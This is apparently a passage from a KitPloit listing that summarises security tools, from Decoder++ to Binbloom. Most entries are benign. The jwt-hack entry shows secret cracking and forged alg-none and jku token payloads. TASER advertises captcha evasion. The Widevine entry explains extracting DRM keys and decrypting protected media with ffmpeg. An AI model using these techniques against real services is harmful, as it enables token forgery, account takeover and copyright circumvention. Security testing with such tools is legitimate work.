Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

Decoder++ - An Extensible Application For Penetration Testers And Software Developers To Decode/Encode Data Into Various Formats

$
0
0


An extensible application for penetration testers and software developers to decode/encode data into various formats.


Setup

Decoder++ can be either installed by using pip or by pulling the source from this repository:

# Install using pip
pip3 install decoder-plus-plus

Overview

This section provides you with an overview about the individual ways of interacting with Decoder++. For additional usage information check out the Advanced Usage section.


Graphical User Interface

If you prefer a graphical user interface to transform your data Decoder++ gives you two choices: a main-window-mode and a dialog-mode.


 

While the main-window-mode supports tabbing, the dialog-mode has the ability to return the transformed content to stdout ready for further processing. This comes quite in handy if you want to call Decoder++ from other tools like BurpSuite (check out the BurpSuite Send-to extension) or any other script in which you want to add a graphical user interface for flexible transformation of any input.



Command Line

If you don't want to startup a graphical user interface but still make use of the various transformation methods of Decoder++ you can use the commandline mode:

$ python3 dpp.py -e base64 -h sha1 "Hello, world!"
e52d74c6d046c390345ae4343406b99587f2af0d

Features
  • User Interfaces:
    • Graphical User Interface
    • Command Line Interface
  • Preinstalled Scripts and Codecs:
    • Encode/Decode: Base16, Base32, Base64, Binary, Gzip, Hex, Html, JWT, HTTP64, Octal, Url, Url+, Zlib
    • Hashing: Adler-32, Apache-Md5, CRC32, FreeBSD-NT, Keccak224, Keccak256, Keccak384, Keccak512, LM, Md2, Md4, Md5, NT, PHPass, RipeMd160, Sha1, Sha3 224, Sha3 256, Sha3 384, Sha3 512, Sha224, Sha256, Sha348, Sha512, Sun Md5
    • Scripts: CSS-Minify, Caesar, Filter-Lines, Identify File Format, Identify Hash Format, JS-Beautifier, JS-to-XML, HTML-Beautifier, Little/Big-Endian Transform, Reformat Text, Remove Newlines, Remove Whitespaces, Search and Replace, Split and Rejoin, Unescape/Escape String
  • Smart-Decode
  • Plugin System
  • Load & Save Current Session
  • Platforms:
    • Windows
    • Linux
    • MAC

Advanced Usage

This section provides you with additional information about how the command line interface and interactive python shell can be used.


Command Line Interface

The commandline interface gives you easy access to all available codecs.

To list them you can use the -l argument. To narrow down your search the -l argument accepts additional parameters which are used as filter:

$ dpp -l base enc

Codec Type
----- ----
base16 encoder
base32 encoder
base64 encoder

Decoder++ distinguishes between encoders, decoders, hashers and scripts. Like the graphical user interface the command line interface allows you to use multiple codecs in a row:

$ dpp "H4sIAAXmeVsC//NIzcnJ11Eozy/KSVEEAObG5usNAAAA" -d base64 -d gzip
Hello, world!

While encoders, decoders and hashers can be used right away, some of the scripts may require additional configuration. To show all available options of a specific script you can add the help parameter:

$ dpp "Hello, world!" -s split_and_rejoin help

Split & Rejoin
==============

Name Value Group Required Description
---- ----- ----- -------- -----------
split_by_chars split_behaviour yes the chars used at which to split the text
split_by_length 0 split_behaviour yes the length used at which to split the text
rejoin_with_chars yes the chars used to join the splitted text

To configure a specific script you need to supply the individual options as name-value pairs (e.g. search_term="Hello"):

$ dpp "Hello, world!" -s search_and_replace search_term="Hello" replace_term="Hey"
Hey, world!

Plugin Development

To add custom codecs just copy them into the $HOME/.config/dpp/plugins/ folder.

from dpp.core.plugin.abstract_plugin import DecoderPlugin

class Plugin(DecoderPlugin):
"""
Possible plugins are DecoderPlugin, EncoderPlugin, HasherPlugin or ScriptPlugin.
See AbstractPlugin or it's implementations for more information.
"""

def __init__(self, context):
plugin_name = "URL"
plugin_author = "Your Name"
# Python Libraries which are required to be able to execute the run method of this plugin.
plugin_requirements = ["urllib"]
super().__init__(plugin_name, plugin_author, plugin_requirements)

def run(self, text):
# Load the required libraries here ...
import urllib.parse
# Run your action ...
return urllib.parse.unquote(text)

Contribute

Feel free to open a new ticket for any feature request or bugs. Also don't hesitate to issue a pull-requests for new features/plugins.

Thanks to

  • Tim Menapace (RIPEMD160, KECCAK256)
  • Robin Krumnow (ROT13)

Troubleshooting

Signals are not working on Mac OS

When starting Decoder++ in Mac OS signals are not working.

This might happen when PyQt5 is installed using homebrew. To fix this issue it is recommended to install the libdbus-1 library. See http://doc.qt.io/qt-5/osx-issues.html#d-bus-and-macos for more information regarding this issue.


Can not start Decoder++ in Windows using CygWin

When starting Decoder++ in CygWin an error occurs:

  ModuleNotFoundError: No module named 'PyQt5'

This happens although PyQt5 is installed using pip. Currently there is no fix for that. Instead it is recommended to start Decoder++ using the Windows command line.


Inspired By
  • PortSwigger's Burp Decoder

Powered By
  • PyQt5
  • QtAwesome



JWT-Hack - Tool To En/Decoding JWT, Generate Payload For JWT Attack And Very Fast Cracking(Dict/Brutefoce)

$
0
0


jwt-hack is tool for hacking / security testing to JWT. Supported for En/decoding JWT, Generate payload for JWT attack and very fast cracking(dict/brutefoce)


Installation

go-get(dev version)
$ go get -u github.com/hahwul/jwt-hack

homebrew
$ brew tap hahwul/jwt-hack
$ brew install jwt-hack

snapcraft
$ sudo snap install jwt-hack

Usage
   d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP
88p 888,o.d88 '88d ______ 88888888 88'8o d88 888o8P'
88P 888P`Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L
88888' 88P YP8 '88p 88P 888 8b `Y' d888888 888 `8p
-------------------------
Hack the JWT(JSON Web Token) | by @hahwul | v1.0.0

Usage:
jwt-hack [command]

Available Commands:
crack Cracking JWT Token
decode Decode JWT to JSON
encode Encode json to JWT
help Help about any command
payload Genera te JWT Attack payloads
version Show version

Flags:
-h, --help help for jwt-hack



Encode mode(JSON to JWT)
$ jwt-hack encode '{"json":"format"}' --secret={YOUR_SECRET}

e.g

$ jwt-hack encode '{"test":"1234"}' --secret=asdf
d8p 8d8 d88 888888888 888 888 ,8b. doooooo 888 ,dP
88p 888,o.d88 '88d ______ 88888888 88'8o d88 888o8P'
88P 888P`Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L
88888' 88P YP8 '88p 88P 888 8b `Y' d888888 888 `8p
-------------------------
INFO[0000] Encoded result algorithm=HS256
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXN0IjoiMTIzNCJ9.JOL1SYkRZYUz9GVny-DgoDj60C0RLz929h1_fFcpqQA

Decode mode(JWT to JSON)
$ jwt-hack decode {JWT_CODE}

e.g

$ jwt-hack decode eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

d8p 8d8 d88 888888888 888 888 ,8b. doooooo 888 ,dP
88p 888,o.d88 '88d ______ 88888888 88'8o d88 888o8P'
88P 888P`Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L
88888' 88P YP8 '88p 88P 888 8b `Y' d888888 888 `8p
-------------------------
INFO[0000] Decoded data(claims) header="{\"alg\":\"HS256\",\"typ\":\"JWT\"}" method="&{HS256 5}"
{"iat":1516239022,"name":"John Doe","sub":"1234567890"}

Crack mode(Dictionary attack / BruteForce)
$ jwt-hack crack -w {WORDLIST} {JWT_CODE}

e.g

$ jwt-hack crack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRA -w samples/wordlist.txt

d8p 8d8 d88 888888888 888 888 ,8b. doooooo 888 ,dP
88p 888,o.d88 '88d ______ 88888888 88'8o d88 888o8P'
88P 888P`Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L
88888' 88P YP8 '88p 88P 888 8b `Y' d888888 888 `8p
-------------------------
[*] Start dict cracking mode
INFO[0000] Loaded words (remove duplicated) size=16
INFO[0000] Invalid signature word=fas
INFO[0000] Invalid signature word=asd
INFO[0000] Invalid signature word=1234
INFO[0000] Invalid signature word=efq
INFO[0000] Invalid signature word=asdf
INFO[0000] Invalid signature word=2q
INFO[0000] Found! Token signature secret is test Signature=Verified Word=test
INFO[0000] Invalid signature word=dfas
INFO[0000] Invalid signature word=ga
INFO[0000] Invalid signature word=f
INFO[0000] Invalid signature word=ds
INFO[0000] Invalid signature word=sad
INFO[0000] Invalid signature word=qsf
...
INFO[0000] Invalid signature word=password
INFO[0000] Invalid signature word=error
INFO[0000] Invalid signature word=calendar
[+] Found! JWT signature secret: test
[+] Finish crack mode

Payload mode(Alg none attack, etc..)
$ jwt-hack payload {JWT_CODE}

e.g

$ jwt-hack payload eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRA
d8p 8d8 d88 888888888 888 888 ,8b. doooooo 888 ,dP
88p 888,o.d88 '88d ______ 88888888 88'8o d88 888o8P'
88P 888P`Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L
88888' 88P YP8 '88p 88P 888 8b `Y' d888888 888 `8p
-------------------------
payload called
INFO[0000] Generate none payload header="{\"alg\":\"none\",\"typ\":\"JWT\"}" payload=none
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
INFO[0000] Generate NonE payload header="{\"alg\":\"NonE\",\"typ\":\"JWT\"}" payload=NonE
eyJhbGciOiJOb25FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDI yfQ.
INFO[0000] Generate NONE payload header="{\"alg\":\"NONE\",\"typ\":\"JWT\"}" payload=NONE
eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
INFO[0000] Generate jku payload header="{\"alg\":\"hs256\",\"jku\":\"https://www.google.com\",\"typ\":\"JWT\"}" payload=jku
eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
INFO[0000] Generate x5u payload header="{\"alg\":\"hs256\",\"x5u\":\"https://www.google.com\",\"typ\":\"JWT\"}" payload=x5u
eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.


TASER - Python3 Resource Library For Creating Security Related Tooling

$
0
0


TASER (Testing And SEecurity Resource) is a Python resource library used to simplify the process of creating offensive security tooling, especially those relating to web or external assessments. It's modular design makes it easy for code to be customized and re-purposed in a variety of scenarios.


Key features
  • Easily invoke web spiders or search engine scrapers to aid in data collection.
  • Supports rotating User-Agents and/or proxies, and custom headers per request to evade captchas.
  • Implement concurrent web requests with threading or asyncio.
  • Uses Python logging to create custom console, file, and database loggers for various output formats.
  • Automatically detect Windows OS to control ANSI colored output, when using the Taser custom adapter.

Install

Latest code commits:

git clone https://github.com/m8r0wn/taser
cd taser
python3 setup.py install

Last release:

pip3 install taser

Getting Started

Find the latest documentation on the project Wiki, or checkout the examples folder for sample tools and usage.


@ToDo
  • Documentation
  • Hack the Planet!


Grype - A Vulnerability Scanner For Container Images And Filesystems

$
0
0


A vulnerability scanner for container images and filesystems. Easily install the binary to try it out.


Features

  • Scan the contents of a container image or filesystem to find known vulnerabilities.
  • Find vulnerabilities for major operating system packages
    • Alpine
    • BusyBox
    • CentOS / Red Hat
    • Debian
    • Ubuntu
  • Find vulnerabilities for language-specific packages
    • Ruby (Bundler)
    • Java (JARs, etc)
    • JavaScript (NPM/Yarn)
    • Python (Egg/Wheel)
    • Python pip/requirements.txt/setup.py listings
  • Supports Docker and OCI image formats

If you encounter an issue, please let us know using the issue tracker.


Getting started

Install the binary, and make sure that grype is available in your path. To scan for vulnerabilities in an image:

grype <image>

The above command scans for vulnerabilities that are visible in the container (i.e., the squashed representation of the image). To include software from all image layers in the vulnerability scan, regardless of its presence in the final image, provide --scope all-layers:

grype <image> --scope all-layers

Grype can scan a variety of sources beyond those found in Docker.

# scan a container image archive (from the result of `docker image save ...`, `podman save ...`, or `skopeo copy` commands)
grype path/to/image.tar

# scan a directory
grype dir:path/to/dir

The output format for Grype is configurable as well:

grype <image> -o <format>

Where the formats available are:

  • json: Use this to get as much information out of Grype as possible!
  • cyclonedx: An XML report conforming to the CycloneDX 1.2 specification.
  • table: A columnar summary (default).

Grype pulls a database of vulnerabilities derived from the publicly available Anchore Feed Service. This database is updated at the beginning of each scan, but an update can also be triggered manually.

grype db update

Installation

Recommended

# install the latest version to /usr/local/bin
curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin

# install a specific version into a specific dir
curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b <SOME_BIN_PATH> <RELEASE_VERSION>

macOS

brew tap anchore/grype
brew install grype

You may experience a "macOS cannot verify app is free from malware" error upon running Grype because it is not yet signed and notarized. You can override this using xattr.

xattr -rd com.apple.quarantine grype

Shell Completion

Grype supplies shell completion through its CLI implementation (cobra). Generate the completion code for your shell by running one of the following commands:

  • grype completion <bash|fish>
  • go run main.go completion <bash|fish>

This will output a shell script to STDOUT, which can then be used as a completion script for Grype. Running one of the above commands with the -h or --help flags will provide instructions on how to do that for your chosen shell.

Note: Cobra has not yet released full ZSH support, but as soon as that gets released, we will add it here!


Configuration

Configuration search paths:

  • .grype.yaml
  • .grype/config.yaml
  • ~/.grype.yaml
  • <XDG_CONFIG_HOME>/grype/config.yaml

Configuration options (example values are the default):

# enable/disable checking for application updates on startup
check-for-app-update: true

# same as --fail-on ; upon scanning, if a severity is found at or above the given severity then the return code will be 1
# default is unset which will skip this validation (options: negligible, low, medium, high, critical)
fail-on-severity: ''

# same as -o ; the output format of the vulnerability report (options: table, json, cyclonedx)
output: "table"

# same as -s ; the search space to look for packages (options: all-layers, squashed)
scope: "squashed"

# same as -q ; suppress all output (except for the vulnerability list)
quiet: false

db:
# check for database updates on execution
auto-update: true

# location to write the vulnerability database cache
cache-dir: "$XDG _CACHE_HOME/grype/db"

# URL of the vulnerability database
update-url: "https://toolbox-data.anchore.io/grype/databases/listing.json"

log:
# location to write the log file (default is not to have a log file)
file: ""

# the log level; note: detailed logging suppress the ETUI
level: "error"

# use structured logging
structured: false

Future plans

The following areas of potential development are currently being investigated:

  • Support for allowlist, package mapping
  • Establish a stable interchange format w/Syft
  • Accept SBOM (CycloneDX, Syft) as input instead of image/directory


iSH - Linux Shell For iOS

$
0
0


A project to get a Linux shell running on iOS, using usermode x86 emulation and syscall translation.

For the current status of the project, check the issues tab, and the commit logs.


Hacking

This project has a git submodule, make sure to clone with --recurse-submodules or run git submodule update --init after cloning.

You'll need these things to build the project:

  • Python 3
  • Ninja
  • Meson (pip install meson)
  • Clang and LLD (on mac, brew install llvm, on linux, sudo apt install clang lld or sudo pacman -S clang lld or whatever)
  • sqlite3 (this is so common it may already be installed on linux and is definitely already installed on mac. if not, do something like sudo apt install libsqlite3-dev)
  • libarchive (brew install libarchive, sudo port install libarchive, sudo apt install libarchive-dev) TODO: bundle this dependency

Build for iOS

Open the project in Xcode, open iSH.xcconfig, and change ROOT_BUNDLE_IDENTIFIER to something unique. Then click Run. There are scripts that should do everything else automatically. If you run into any problems, open an issue and I'll try to help.


Build command line tool for testing

To set up your environment, cd to the project and run meson build to create a build directory in build. Then cd to the build directory and run ninja.

To set up a self-contained Alpine linux filesystem, download the Alpine minirootfs tarball for i386 from the Alpine website and run ./tools/fakefsify, with the minirootfs tarball as the first argument and the name of the output directory as the second argument. Then you can run things inside the Alpine filesystem with ./ish -f alpine /bin/login -f root, assuming the output directory is called alpine. If tools/fakefsify doesn't exist for you in your build directory, that might be because it couldn't find libarchive on your system (see above for ways to install it.)

You can replace ish with tools/ptraceomatic to run the program in a real process and single step and compare the registers at each step. I use it for debugging. Requires 64-bit Linux 4.11 or later.


Logging

iSH has several logging channels which can be enabled at build time. By default, all of them are disabled. To enable them:

  • In Xcode: Set the ISH_LOG setting in iSH.xcconfig to a space-separated list of log channels.
  • With Meson (command line tool for testing): Run meson configure -Dlog="<space-separated list of log channels>.

Available channels:

  • strace: The most useful channel, logs the parameters and return value of almost every system call.
  • instr: Logs every instruction executed by the emulator. This slows things down a lot.
  • verbose: Debug logs that don't fit into another category.
  • Grep for DEFAULT_CHANNEL to see if more log channels have been added since this list was updated.

A note on the JIT

Possibly the most interesting thing I wrote as part of iSH is the JIT. It's not actually a JIT since it doesn't target machine code. Instead it generates an array of pointers to functions called gadgets, and each gadget ends with a tailcall to the next function; like the threaded code technique used by some Forth interpreters. The result is a speedup of roughly 3-5x compared to pure emulation.

Unfortunately, I made the decision to write nearly all of the gadgets in assembly language. This was probably a good decision with regards to performance (though I'll never know for sure), but a horrible decision with regards to readability, maintainability, and my sanity. The amount of bullshit I've had to put up with from the compiler/assembler/linker is insane. It's like there's a demon in there that makes sure my code is sufficiently deformed, and if not, makes up stupid reasons why it shouldn't compile. In order to stay sane while writing this code, I've had to ignore best practices in code structure and naming. You'll find macros and variables with such descriptive names as ss and s and a. Assembler macros nested beyond belief. And to top it of f, there are almost no comments.

So a warning: Long-term exposure to this code may cause loss of sanity, nightmares about GAS macros and linker errors, or any number of other debilitating side effects. This code is known to the State of California to cause cancer, birth defects, and reproductive harm.



Awesome Android Security - A Curated List Of Android Security Materials And Resources For Pentesters And Bug Hunters

$
0
0


A curated list of Android Security materials and resources For Pentesters and Bug Hunters.


Blog

How To's

Paper

Books

Course

Tools

Static Analysis

Dynamic Analysis

Online APK Analyzers

Online APK Decompiler

Labs

Talks

Misc

Bug Bounty & Writeup

Cheat Sheet


Scrying - A Tool For Collecting RDP, Web And VNC Screenshots All In One Place

$
0
0


A new tool for collecting RDP, web and VNC screenshots all in one place

This tool is still a work-in-progress and should be mostly usable but is not yet complete. Please file any bugs or feature requests as GitHub issues


Caveats
  • Web screenshotting relies on Chromium or Google Chrome being installed

Motivation

Since Eyewitness recently dropped support for RDP there isn't a working CLI tool for capturing RDP screenshots. Nessus still works, but it's a pain to get the images out and they're not included in the export file.

I thought this was a good opportunity to write a fresh tool that's more powerful than those that came before. Check out the feature list!


Installation

For web screenshotting, scrying currently depends on there being an installation of Chromium or Google Chrome. Install with pacman -S chromium or the equivalent for your OS.

Download the latest release from the releases tab. There's a Debian package available for distros that use them (install with sudo dpkg -i scrying*.deb), and zipped binaries for Windows, Mac, and other Linuxes.


Usage

Grab a single web page, RDP server, or VNC server:

$ scrying -t http://example.com
$ scrying -t rdp://192.0.2.1
$ scrying -t 2001:db8::5 --mode web
$ scrying -t 2001:db8::5 --mode rdp
$ scrying -t 192.0.2.2
$ scrying -t vnc://[2001:db8::53]:5901

Automatically grab screenshots from an nmap output:

$ nmap -iL targets.txt -p 80,443,8080,8443,3389 -oX targets.xml
$ scrying --nmap targets.xml

Choose a different output directory for images:

$ scrying -t 2001:db8::3 --output-dir /tmp/scrying_outputs

Run from a targets file:

$ cat targets.txt
http://example.com
rdp://192.0.2.1
2001:db8::5
$ scrying -f targets.txt

Run through a web proxy:

$ scrying -t http://example.com --web-proxy http://127.0.0.1:8080
$ scrying -t http://example.com --web-proxy socks5://\[::1\]:1080

Image files are saved as PNG in the following directory structure:

output
├── report.html
├── rdp
│   └── 192.0.2.1-3389.png
├── vnc
│   └── 192.0.2.1-5900.png
└── web
└── https_example.com.png

Check out the report at output/report.html!


Features:

Features with ticks next to them have been implemented, others are TODO

  • ✔️ Automatically decide whether an input should be treated as a web address or RDP server
  • ✔️ Automatically create output directory if it does not already exist
  • ✔️ Save images with consistent and unique filenames derived from the host/IP
  • ✔️ Full support for IPv6 and IPv4 literals as well as hostnames
  • ✔️ Read targets from a file and decide whether they're RDP or HTTP or use hints
  • ✔️ Parse targets smartly from Nmap and Nessus output
  • ✔️ HTTP - uses Chromium/Chrome in headless mode
  • ✔️ Full cross-platform support - tested on Linux, Windows and Mac
  • Produces an HTML report to allow easy browsing of the results
  • VNC
  • RDP - mostly working, does not support "plain RDP" mode, see #15
  • Video streams - tracking issue #5
  • option for timestamps in filenames
  • Read targets from a msf services -o csv output
  • OCR on RDP usernames, either live or on a directory of images
  • NLA/auth to test credentials
  • Parse Dirble JSON output to grab screenshots of an entire website - waiting for nccgroup/dirble#51

Help text
USAGE:
scrying [FLAGS] [OPTIONS] <--file <FILE>...|--nmap <NMAP XML FILE>...|--nessus <NESSUS XML FILE>...|--target <TARGET>...>

FLAGS:
-s, --silent Suppress most log messages
--test-import Exit after importing targets
-v, --verbose Increase log verbosity
-h, --help Prints help information
-V, --version Prints version information

OPTIONS:
-f, --file <FILE>... Targets file, one per line
-l, --log-file <LOG FILE> Save logs to the given file
-m, --mode <MODE>
Force targets to be parsed as `web`, `rdp`, `vnc` [default: auto] [possible values:
web, rdp, vnc, auto]
--nessus <NESSUS XML FILE>... Nessus XML file
--nmap <NMAP XML FILE>... Nmap XML file
-o, --output <OUTPUT DIR> D irectory to save the captured images in [default: output]
--proxy <PROXY>
Default SOCKS5 proxy to use for connections e.g. socks5://[::1]:1080

--rdp-proxy <RDP PROXY>
SOCKS5 proxy to use for RDP connections e.g. socks5://[::1]:1080

--rdp-timeout <RDP TIMEOUT>
Seconds to wait after last bitmap before saving an image [default: 2]

-t, --target <TARGET>... Target, e.g. http://example.com, rdp://[2001:db8::4]
--threads <THREADS> Number of worker threads for each target type [default: 10]
--web-proxy <WEB PROXY>
HTTP/SOCKS Proxy to use for web requests e.g. http://[::1]:8080


Widevine-L3-Decryptor - A Chrome Extension That Demonstrates Bypassing Widevine L3 DRM

$
0
0


Widevine is a Google-owned DRM system that's in use by many popular streaming services (Netflix, Spotify, etc.) to prevent media content from being downloaded.

But Widevine's least secure security level, L3, as used in most browsers and PCs, is implemented 100% in software (i.e no hardware TEEs), thereby making it reversible and bypassable.

This Chrome extension demonstrates how it's possible to bypass Widevine DRM by hijacking calls to the browser's Encrypted Media Extensions (EME) and decrypting all Widevine content keys transferred - effectively turning it into a clearkey DRM.


Usage

To see this concept in action, just load the extension in Developer Mode and browse to any website that plays Widevine-protected content, such as https://bitmovin.com/demos/drm[Update: link got broken?].

Keys will be logged in plaintext to the javascript console.

e.g:

WidevineDecryptor: Found key: 100b6c20940f779a4589152b57d2dacb (KID=eb676abbcb345e96bbcf616630f1a3da)

Decrypting the media itself is then just a matter of using a tool that can decrypt MPEG-CENC streams, like ffmpeg.

e.g:

ffmpeg -decryption_key 100b6c20940f779a4589152b57d2dacb -i encrypted_media.mp4 -codec copy decrypted_media.mp4

NOTE: The extension currently supports the Windows platform only.


How

In the context of browsers the actual decryption of the media is usually done inside a proprietary binary (widevinecdm.dll, known as the Content Decryption Module or CDM) only after receiving the license from a license server with an encrypted key in it.

This binary is usually heavily obfuscated and makes use of third-party solutions that claim to offer software "protection" such as Arxan or Whitecryption.

Some reversing job on that binary can then be done to extract the secret keys and mimic the key decryption algorithm from the license response.


Why

This PoC was done to further show that code obfuscation, anti-debugging tricks, whitebox cryptography algorithms and other methods of security-by-obscurity will eventually by defeated anyway, and are, in a way, pointless.


Legal Disclaimer

This is for educational purposes only. Downloading copyrighted materials from streaming services may violate their Terms of Service. Use at your own risk.




eDEX-UI - A Cross-Platform, Customizable Science Fiction Terminal Emulator With Advanced Monitoring &Touchscreen Support

$
0
0


eDEX-UI is a fullscreen, cross-platform terminal emulator and system monitor that looks and feels like a sci-fi computer interface.

Heavily inspired from the TRON Legacy movie effects (especially the Board Room sequence), the eDEX-UI project was originally meant to be "DEX-UI with less « art » and more « distributable software »". While keeping a futuristic look and feel, it strives to maintain a certain level of functionality and to be usable in real-life scenarios, with the larger goal of bringing science-fiction UXs to the mainstream.


Features
  • Fully featured terminal emulator with tabs, colors, mouse events, and support for curses and curses-like applications.
  • Real-time system (CPU, RAM, swap, processes) and network (GeoIP, active connections, transfer rates) monitoring.
  • Full support for touch-enabled displays, including an on-screen keyboard.
  • Directory viewer that follows the CWD (current working directory) of the terminal.
  • Advanced customization using themes, on-screen keyboard layouts, CSS injections. See the wiki for more info.
  • Optional sound effects made by a talented sound designer for maximum hollywood hacking vibe.

Screenshots



(neofetch on eDEX-UI 2.2 with the default "tron" theme & QWERTY keyboard)


 

(Graphical settings editor and list of keyboard shortcuts on eDEX-UI 2.2 with the "interstellar" bright theme)


 

(cmatrix on eDEX-UI 2.2 with the experimental "tron-disrupted" theme, and the user-contributed DVORAK keyboard)


Useful commands for the nerds

IMPORTANT NOTE: the following instructions are meant for running eDEX from the latest unoptimized, unreleased, development version. If you'd like to get stable software instead, refer to these instructions.


Starting from source:

on *nix systems (You'll need the Xcode command line tools on macOS):

  • clone the repository
  • npm run install-linux
  • npm start

on Windows:

  • start cmd or powershellas administrator
  • clone the repository
  • npm run install-windows
  • npm start

Building

Note: Due to native modules, you can only build targets for the host OS you are using.

  • npm install (NOT install-linux or install-windows)
  • npm run build-linux or build-windows or build-darwin

The script will minify the source code, recompile native dependencies and create distributable assets in the dist folder.


A note about versioning, branches, and commit messages

Currently, development is done directly on the master branch. The version tag on this branch is the version tag of the next release with the -pre suffix (e.g v2.6.1-pre), to avoid confusion when both release and source versions are installed on one's system.

I use gitmoji to make my commit messages, but I'm not enforcing this on this repo so commits from PRs and the like might not be formatted that way.

Dependabot runs weekly to check dependencies updates. It is setup to auto-merge most of them as long as the builds checks passes.


Credits

eDEX-UI's source code was primarily written by me, Squared. If you want to get in touch with me or find other projects I'm involved in, check out my website.

PixelyIon helped me get started with Windows compatibility and offered some precious advice when I started to work on this project seriously.

IceWolf composed the sound effects on v2.1.x and above. He makes really cool stuff, check out his music!


Thanks

Of course, eDEX would never have existed if I hadn't stumbled upon the amazing work of Seena on r/unixporn.

This project uses a bunch of open-source libraries, frameworks and tools, see the full dependency graph.

I want to namely thank the developers behind xterm.js, systeminformation and SmoothieCharts.

Huge thanks to Rob "Arscan" Scanlon for making the fantastic ENCOM Globe, also inspired by the TRON: Legacy movie, and distributing it freely. His work really puts the icing on the cake.



Binbloom - Raw Binary Firmware Analysis Software

$
0
0


The purpose of this project is to analyse a raw binary firmware and determine automatically some of its features. This tool is compatible with all architectures as basically, it just does simple statistics on it.

In order to compute the loading address, you will need the help of an external reverse engineering tool to extract a list of potential functions, before using binbloom.


Main features:

  • Loading address: binbloom can parse a raw binary firmware and determine its loading address.
  • Endianness: binbloom can use heuristics to determine the endianness of a firmware.
  • UDS Database: binbloom can parse a raw binary firmware and check if it contains an array containing UDS command IDs.

Download / Install

First, clone the git repository:

git clone https://github.com/quarkslab/binbloom.git
cd binbloom

To build the latest version:

mkdir build
cd build
cmake ..
make

To install the latest version (linux only):

make install

Getting started

Determine the endianness
binbloom -f firmware.bin -e

This command should give an output like this:

Loaded firmware.bin, size:624128, bit:fff00000, 000fffff, nb_segments:4096, shift:20
End address:00098600
Determining the endianness
Computing heuristics in big endian order:
Base: 00000000: unique pointers:1839, number of array elements:217900
Base: 01000000: unique pointers:1343, number of array elements:13085
Base: 02000000: unique pointers:621, number of array elements:5735
Base: 03000000: unique pointers:566, number of array elements:3823
Base: 05000000: unique pointers:575, number of array elements:6139
Base: 80000000: unique pointers:642, number of array elements:528
247210
Computing score in little endian order:
Base: 00000000: unique pointers:8309, number of array elements:515404
515404
This firmware seems to be LITTLE ENDIAN

In this output, the last line is the most important one as it gives the result of the analysis. The other lines are information about the number of unique pointers and number of array elements binbloom has been able to find in the firmware, both in big endian and in little endian mode. These lines can provide useful information to corroborate the heuristic used to determine the endianness.


Determine the loading address

First, you have to provide a file containing a list of potential functions addresses, in hexadecimal (one per line), like this:

00000010
00000054
000005f0
00000a50
00000a54
00000ac0
00000b40
00000b6c
00000b74
00000bc0

This file should be named after the firmware itself, followed with the ".fun" extension.

This file can be generated with the tag_code() function of the provided tag_code.py python script, using IDA Pro:

  • Load the firmware in IDA Pro at address 0 (select the correct architecture/endianness)
  • From the File menu, choose Script File and select tag_code.py
  • In the console at the bottom of IDA Pro, use tag_code(). The functions file is automatically generated.

If you prefer to use another tool to generate the functions file, you can do it as long as you load the firmware at address 0 (i.e. the hex values in the functions file correspond to offsets in the firmware).

You can then ask binbloom to compute a (list of) potential loading address(es) by computing a correlation score between the potential functions and the arrays of functions pointers that can be found in the firmware:

binbloom -f firmware.bin -b

This command should give an output like this:

Loaded firmware.bin, size:2668912, bit:ffc00000, 003fffff, nb_segments:1024, shift:22
End address:0028b970
loaded 14903 functions

Highest score for base address: 1545, for base address 80010000
For information, here are the best scores:
For base address 80010000, found 1545 functions
Saving function pointers for this base address...
Done.

In this output, we can see that on the 14903 provided potential functions, 1545 were found in function pointers arrays when the program takes the assumption that the loading address is 0x80010000.

If there are several sections in the binary firmware, binbloom lists the different sections with the corresponding guess for the loading address:

Highest score for base address: 93, for base address 00000000
For information, here are the best scores:
For base address 00000000, found 93 functions
For base address 00040000, found 93 functions

Here we have a section of code at address 0x00000000, and another one at 0x00040000.

Binbloom generates 2 output files:

  • firmware.fad : this file contains the addresses of identified functions
